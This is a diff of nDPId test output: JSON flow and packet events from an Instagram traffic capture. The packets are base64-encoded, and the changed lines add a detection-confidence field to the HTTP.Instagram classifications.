 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"}
 02368{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"}
 02359{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="}
 02365{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 02384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="}
+00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"}
 02378{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="}
-00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
